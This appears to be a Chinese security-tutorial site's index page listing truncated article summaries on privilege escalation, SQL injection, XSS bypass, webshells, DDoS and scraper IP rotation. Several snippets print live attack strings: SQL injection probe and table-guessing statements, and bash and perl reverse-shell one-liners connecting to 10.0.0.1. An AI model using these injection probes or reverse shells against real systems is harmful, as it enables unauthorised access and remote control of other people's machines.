-
详解Filezilla server 提权
服务器权限提升简称提权,是指由原本的80端口低权限例如普通network权限提升至System权限,进而得到服务器的所有控制权。提权大致分为三种类型,分别是:1,堆栈溢出执行任意代码;2,利用现有运行的system权限的软件;3,通过社会工程学匹配管理员账号的密码。本文讲的是…
次 时间:2018-05-09
-
sql手工注入语句&SQL手工注入大全
看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access4.注入参数是字符and [查询条件] and =5.搜索时没过滤参数…
次 时间:2018-05-09
-
网站MYSQL数据库高级爆错注入原分析
这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652 grouping on certain parts of the result from rand, causes a duplicate key error. 重现过程: SQL Code复制内容到剪贴板
次 时间:2018-05-09
-
详解如何通过“鼠洞”控制电脑
入侵电脑防御是为了更好的做好防御准备,网络安全需要我们大家来维护,一起来看看通过“鼠洞”控制电脑吧。通过“鼠洞”控制你的电脑 夜黑风高,一个黑色的身影窜入了一间电脑机房。熟练地打开了一台保存有重要数据的电脑。可是这个…
次 时间:2018-05-09
-
浅谈史上最大DDoS攻击的本质与防范
ddos攻击的意思是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,最后可以成倍地提高拒绝服务攻击的威力。DDos攻击在今天看来并不新鲜,近两年来发展态势也渐趋平缓,直至一个月前,欧洲反垃圾邮件组织Spamhaus突然遭受到高…
次 时间:2018-05-09
-
使用爬虫采集网站时,解决被封IP的几种方法
方法1.之前由于公司项目需要,采集过google地图数据,还有一些大型网站数据。经验如下:1.IP必须需要,像@alswl 说的非常正确,ADSL。如果有条件,其实可以跟机房多申请外网IP。2.在有外网IP的机器上,部署代理服务器。3.你的程序,使用轮训替换代理服务器来访问想要采集…
次 时间:2018-05-09
-
Python 爬虫使用动态切换ip防止封杀
上次有说过,我在新公司有部分工作是负责爬虫业务的,爬虫机器有上百台,节点也要计划迁入了Docker平台上。 这两天遇到一个棘手的问题,就是因为我们为了追求数据量,在某些机房,用docker启动了不少爬虫节点,导致一些傻逼网站,开始封禁我们…. &hellip…
次 时间:2018-05-09
-
XSS绕过技术 XSS插入绕过一些方式总结
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。四…
次 时间:2018-05-09
-
一句话木马后门在防注入中的重生
对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,同时也把非法提交的数据写入了系统的后缀为ASP的文件中,这也给了我们一些可利用的地方,大家知道,一…
次 时间:2018-05-09
-
ASP+PHP 标准sql注入语句(完整版)
1.判断有无注入点 ; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回正确页面 …
次 时间:2018-05-09
-
SQL注入黑客防线网站实例分析
今天到黑防站上去看看文章,可能出于“职业”习惯,看到?classid=1之类的东东就不由自主的想加点什么参数进去。当在页面http://www.hacker.com.cn/article/index.asp?classid=3&Nclassid=13加上①and 1=1和②and 1=2,都提示“处理 URL…
次 时间:2018-05-09
-
Linux 下多种编程语言的反弹 shell 方法
bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl版本:perl -e use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">…
次 时间:2018-05-09